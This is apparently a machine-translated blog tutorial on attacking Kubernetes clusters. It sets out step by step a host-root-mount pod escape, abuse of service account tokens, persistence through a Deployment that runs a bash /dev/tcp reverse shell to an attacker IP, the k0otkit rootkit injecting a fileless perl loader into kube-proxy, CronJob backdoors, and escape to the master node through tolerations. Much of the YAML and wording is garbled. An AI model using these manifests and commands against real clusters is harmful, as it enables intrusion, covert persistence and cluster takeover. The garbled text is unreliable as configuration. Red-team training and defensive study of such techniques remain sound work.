apiVersion:v1
kind:Pod
metadate:
	name:evilpod
spec:
	containers:
	- image:nginx
	  name:container
	  volumeMounts:
	  - mountPath:/mnt
	    name:test-volume
	volumes:
	- name: test-volume
	  hostPath:
	  	path:/
用deployment创建
apiVersion: apps/v1
kind:Deployment
metadata:
	name:nginx-deployment
	labels:
		apps:nginx-test
spec:
	replicas:1
	selector:
		matchLabels:
			app:nginx
	template:
		metadata:
			labels:
				app:nginx
		spec:
			containers:
			- image:nginx
			  name:container
			  volumeMounts:
			  - mountPath : /mnt
			    name: test-volume
			volumes:
			- name: test-volume
			  hostPath:
			  	path: /

Write the above text into a yaml file, and then execute

kubectl apply -f xxxxx.yaml
如果是api server未授权打进去的,可能要通过-s参数设置一下api server的ip和地址:
kubectl -s http://master_ip:8080 command

这里再多嘴一句 kubectl apply 和 kubectl create 这两个命令的区别:
两个命令都可以用于创建pod,apply更倾向于”维护资源“,可以用于更新已有Pod;而create更倾向于”直接创建“,不管三七二十一给我创建就完事了简而言之,当一个资源已经存在时,用create会报错,而apply不会报错

The malicious container is created

After creation, use the command  kubectl get pods to get the name of the malicious pod

Then use the command  kubectl exec -it evilpodname /bin/bash to enter the internal shell of the pod, and then write the malicious crontab/ssh public key/webshell to the Node root directory mounted inside the Pod to get the shell of the node.

A diagram of the general process is as follows

Use Service Account to connect to API Server to execute instructions

There are two types of accounts in k8s: user accounts and service accounts. User accounts are used for human-cluster interaction (for example, administrators manage clusters), and service accounts are used for pods to interact with clusters (for example, pods call some APIs provided by api server to perform some activities. )

If we invade a Pod with a high-privilege service account, we can use its corresponding service account identity to call the api server to issue commands to the cluster.

The serviceaccount information of the pod is generally stored in /var/run/secrets/kubernetes.io/serviceaccount/the directory

But the default user or service account does not have any permissions

This is by default, a pod uses its own service account (default is the default account of the current namespace) to request the result returned by the api server, and it can be found that there is no permission:

$ CA_CERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
$ TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
$ curl --cacert $CA_CERT -H "Authorization: Bearer $TOKEN" 
"https://192.168.111.20:6443/version/"

  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {}, 
  "status": "Failure",  
  "message": "version is forbidden: User 
  \"system:serviceaccount:default:default\" cannot list resource \"version\" in API group \"\" at the cluster scope",
  "reason": "Forbidden",
  "details": {
  	 "kind": "version"
   },
  "code": 403

So now I create a high-privilege service account and associate it with a Pod to reproduce this attack method

First create a high-privilege service account

kubectl create serviceaccount niubi #创建service account:niubikubectl create clusterrolebinding cluster-admin-niubi  --clusterrole=cluster-admin --serviceaccount=default:niubi #把niubi放入集群管理员组,相当于给了它高权限

Then associate the service account with the pod

在创建Pod的yaml文件中的spec项中输入 serviceAccountName: niubi

Try again and find that the api server can be called

0x03 persistence

Persistence here refers to how to persist in Pod, how to persist in Node, and how to persist in the cluster.
How to persist in Node, some have been mentioned in the previous section: by writing crontab, ssh public key, and webshell, but I personally feel that these methods are not so much persistence as privilege escalation. Be more practical, because these methods are used to escape from the Pod to obtain Node permissions in actual penetration.

At the same time, when doing persistence on Pod, Node, and Master, most of the methods are essentially "how to do persistence on a linux machine", and there are too many "how to do persistence on a linux machine", here are Only focus on the unique persistence method in the "cloud environment".

Implanting a backdoor in a private image library (Pod persistence)

If we take over the other party's private image library, we can directly insert malicious instructions (reverse shell, etc.
) The constructed backdoor file is then packaged into a new image again.

Modify core component access permissions (cluster persistence)

Including but not limited to changing the configuration to expose port 8080 of the apiserver, exposing docker.sock, exposing unauthorized etcd, exposing unauthorized kubelet, etc. to modify the cluster configuration file to achieve persistence.

shadow api server (cluster persistence/cdk tool utilization)

Deploy an additional unauthorized and non-logging api server for us to persist.

We can do this with cdk, a tool for k8s penetration on github (this tool is awesome)

https://github.com/cdk-team/CDK/wiki/CDK-Home-CN

Exploit: k8s shadow apiserver · cdk-team/CDK Wiki · GitHub

Deployment

When creating a container, by enabling  DaemonSets, Deployments, the container and sub-containers can be restored even if they are cleaned up. Attackers often use this feature for persistence. The concepts involved are:

● ReplicationController(RC)

ReplicationControllerPod Ensures that a certain number of replicas are running  at any one time  .

● Replication Set(RS)

Replication SetFor short RS, the official has recommended that we use  RS and  Deployment instead  RC . In fact  , the functions of RS and  RC are basically the same. The only difference at present is that it RC only supports equation-based  selector.

● Deployment

The main responsibilities are  RC the same as that of the controller, which is to ensure  Pod the quantity and health. Most of the functions of the two are exactly the same, and can be regarded as an upgraded version of  RC the controller. Official components  kube-dnsare kube-proxy also used Deploymentto manage.

Used here Deploymentto deploy the backdoor

#dep.yaml
apiVersion: apps/v1
kind: Deployment  #确保在任何时候都有特定数量的Pod副本处于运行状态
metadata:
  name: nginx-deploy
  labels:
    k8s-app: nginx-demo
spec:
  replicas: 3  #指定Pod副本数量
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: nginx
        image: nginx:1.7.9
        imagePullPolicy: IfNotPresent
        command: ["bash"] #反弹Shell
        args: ["-c", "bash -i >& /dev/tcp/192.168.238.130/4242 0>&1"]
        securityContext:
          privileged: true #特权模式
        volumeMounts:
        - mountPath: /host
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
          type: Directory

#创建
kubectl create -f dep.yaml

Rootkit

k8s The one  introduced here  rootkitis k0otkit a general post-infiltration technique that can be used to  Kubernetes infiltrate clusters. Using  , you can (reverse ) manipulate   all nodes in the target cluster k0otkitin a fast, stealthy and sequential manner  .shellKubernetes

K0otkitTechnologies used:

DaemonSetAnd Secretresources (fast and continuous rebound, resource separation)

●  kube-proxyMirroring (local materials)

● Dynamic container injection (high concealment)

●  Meterpreter(traffic encryption)

● Fileless attack (high stealth)

#生成k0otkit
./pre_exp.sh

#监听
./handle_multi_reverse_shell.sh

k0otkit.shCopy the contents to masterexecute:

volume_name=cache
mount_path=/var/kube-proxy-cache
ctr_name=kube-proxy-cache
binary_file=/usr/local/bin/kube-proxy-cache
payload_name=cache
secret_name=proxy-cache
secret_data_name=content

ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')
volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
# create payload secret
cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
apiVersion: v1
kind: Secret
metadata:
  name: $secret_name
  namespace: kube-system
type: Opaque
data:
  $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA......

# inject malicious container into kube-proxy pod
kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
  | sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n        hostPath:\n          path: /\n          type: Directory\n" \
  | sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n        image: $image\n        imagePullPolicy: IfNotPresent\n        command: [\"sh\"]\n        args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/,; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n        env:\n          - name: $payload_name\n            valueFrom:\n              secretKeyRef:\n                name: $secret_name\n                key: $secret_data_name\n        securityContext:\n          privileged: true\n        volumeMounts:\n        - mountPath: $mount_path\n          name: $volume_name" \
  | kubectl --kubeconfig /root/.kube/config replace -f -

cronjob persistence

CronJobIt is used to perform periodic actions, such as backup, report generation, etc. Attackers can use this function to persist.

apiVersion: batch/v1
kind: CronJob  #使用CronJob对象
metadata:
  name: hello
spec:
  schedule: "*/1 * * * *" #每分钟执行一次
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: hello
            image: busybox
            imagePullPolicy: IfNotPresent
            command:
            - /bin/sh
            - -c
            - #反弹Shell或者木马
          restartPolicy: OnFailure

0x04 Privilege Escalation

Refers to getting the Node shell from the pod, or getting the cluster control right.

The above section mentioned some methods, such as kubectl unauthorized, docker.sock, mount directory, high-privilege Service account and other methods.

In addition, there are some CVEs of Docker and k8s

Docker escapes such as CVE-2019-5736 , CVE-2019-14271 , CVE-2020-15257 , CVE-2022-0811

K8s privilege escalation to take over the cluster such as CVE-2018-1002105 , CVE-2020-8558

For docker escape, you can read the related articles on container escape summarized earlier. Here we will talk about privileged container escape.

Privileged container escape

When the container is started with --privilegedoptions, the container can access all devices on the host.

And the K8s configuration file is enabled privileged: true:

spec:
containers:
- name: ubuntu
image: ubuntu:latest
securityContext:
privileged: true

Practical case:

Obtained through the vulnerability WebShell, check the existence of the root directory .dockerenv, and escape from the mounted directory by fdisk -lviewing the disk directory:

#Webshell下操作
fdisk -l
mkdir /tmp/test
mount /dev/sda3 /tmp/test
chroot /tmp/test bash

0x05 detection

● Intranet scanning

● K8s common port detection

● Cluster internal network

Whether in a container environment

  • The existence of the /.dockerenv file in the root directory is the docker environment
  • If /proc/1/cgroup contains docker or kube strings, it is in the docker environment or k8s pod

  • no common commands

  • Check whether there is a k8s or docker string in the environment variable

  • Check the port opening status (netstat -anp), if some special ports are opened such as 6443, 8080 (api server), 2379 (etcd), 10250, 10255 (kubelet), 10256 (kube-proxy), then it can be preliminarily judged to be in A Node or master in the k8s environment, this method can also be used for port scanning to detect whether the target host is a machine in the k8s cluster
  • Check the current network segment.  The Flannel network plug-in in k8s uses 10.244.0.0/16the network by default, and Calico uses 192.168.0.0/16the network by default. If it appears in these network segments (especially the 10.244 network segment), it can be preliminarily judged as a pod in the cluster. There are few commands in the pod, you can check the ip address through hostname -I (uppercase i)

Cluster Intranet Scanning

KubernetesThere are 4 main types of communication in the network of

PodCommunication between containers in the same

Podcommunicate with each other

●  Communication PodwithService

Service● Traffic and inter-communication outside the cluster .

Therefore, it is no different from regular intranet penetration, nmap, masscan等scanning

K8s common port detection

Cluster internal network

●  FlannelThe network plug-in uses 10.244.0.0/16the network by default

CalicoUse 192.168.0.0/16network by default

0x06 Horizontal movement

Purpose

Generally speaking, getting the kubeconfig or the ServiceAccount token that can access the apiserver means controlling the entire cluster.

But often in the red team attack, we often have to obtain the server authority of a certain type of important system to score. We have been able to escape by creating a pod on the node before, so as to obtain the authority of the corresponding host of the node, then can we control the generation of the pod on the specified node and escape from a specified Node or Master node.

Affinity and anti-affinity

Generally speaking, the pods we deploy select nodes through the automatic scheduling strategy of the cluster, but because of some actual business needs, it may be necessary to control the scheduling of certain pods to specific nodes. You need to use a concept in Kubernetes: affinity and anti-affinity.

Affinity is divided into node affinity ( nodeAffinity ) and Pod affinity ( podAffinity ).

  • The popular description of node affinity is used to control which nodes the Pod should be deployed on and which nodes it cannot be deployed on.
  • Pod affinity and anti-affinity indicate that the pod is deployed or not deployed on the node where the pod that satisfies certain labels is located

Node affinity ( nodeAffinity )

Node affinity is mainly used to control which hosts pods are deployed on and which hosts they cannot be deployed on. Demonstrate:

View node's label command

kubectl get nodes --show-labels

Label the node

kubectl label nodes k8s-node01 com=justtest
node/k8s-node01 labeled

When the node is tagged with relevant tags, these tags can be used during scheduling, just add the nodeSelector field to the spec field of the Pod

apiVersion: v1
kind: Pod
metadata:
  name: node-scheduler
spec:
  nodeSelector:
    com: justtest

Pod affinity ( podAffinity )

Pod affinity mainly deals with the relationship between pods. For example, if a pod is on a node, the other must also be on this node, or if your pod is on a node, then I don’t want to stay with you on the same node.

Taints and Tolerances

Node affinity is a property of a Pod that causes a Pod to be attracted to a specific class of nodes. Taints are the opposite - they enable nodes to exclude a specific class of Pods.

Taint Marking Options:

  • NoSchedule , indicating that pods will not be scheduled to nodes marked with taints
  • PreferNoSchedule , the soft policy version of NoSchedule, means not to schedule to the tainted node as much as possible
  • NoExecute  : This option means that once Taint takes effect, if the running pod in the node does not correspond to the Tolerate setting, it will be evicted directly

The cluster we built using kubeadm adds a taint mark to the master node (master node) by default, so we see that our usual pods are not scheduled to the master. Unless one Podcan tolerate the stain. Usually, the taint  Podis tolerated at the system level Pod, such askube-system

Mark the taint for the specified node:

kubectl taint nodes k8s-node01 test=k8s-node01:NoSchedule

The k8s-node01 node is marked as a taint above, and the impact policy is NoSchedule, which only affects new pod scheduling.

Since the node01 node is marked as a tainted node, we need to add a statement of tolerance if we want the pod to be scheduled to the node01 node

Using taints and tolerances allows Pods to flexibly avoid certain nodes or expel certain Pods from nodes.

For detailed concepts, please refer to the official website document: Pollution and Tolerance | Kubernetes

Implement master node escape

For example, if you want to get the shell of the master node, you can consider these two points

  • Remove "taints" (not recommended for production environments)
  • Let the pod be able to tolerate (tolerations) the "taint" on the node.

Check the node status of k8s-master and confirm the tolerance of the Master node:

Create a Pod with a tolerance parameter and mount the root directory of the host

apiVersion: v1
kind: Pod
metadata:
  name: myapp2
spec:
  containers:
  - image: nginx
    name: test-container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  tolerations:
  - key: node-role.kubernetes.io/master
    operator: Exists
    effect: NoSchedule
  volumes:
  - name: test-volume
    hostPath:
      path: /
kubectl -s 192.168.11.152:8080 create -f test.yaml --validate=false
kubectl -s 192.168.11.152:8080 --namespace=default exec -it test-master bash

Then write the ssh public key according to the above method of escaping the node01 node to getshell.

4. Post-infiltration & cluster persistence

Exploration of horizontal nodes and persistent concealment methods after K8S penetration

5. Reference

https://www.const27.com/2022/03/13/k8s security entry learning/  (k8s basics, attack matrix)

https://paper.seebug.org/1803/ (k8s attack matrix)

K8S Cloud Native Environment Penetration Learning - Prophet Community  (K8S Cloud Native Environment Penetration Learning)

Exploration of horizontal nodes and persistent concealment methods after K8S penetration  (exploration of horizontal nodes and persistent concealment methods after K8S penetration)

RBAC utilization of K8S API access control

Kubernetes tutorial | Kuboard (very good Chinese tutorial)

Learn the basics of Kubernetes | Kubernetes (k8s official tutorial, with an interactive interface, a little bad is that there is no Chinese in some places)

Guess you like

Origin blog.csdn.net/Python_0011/article/details/129716131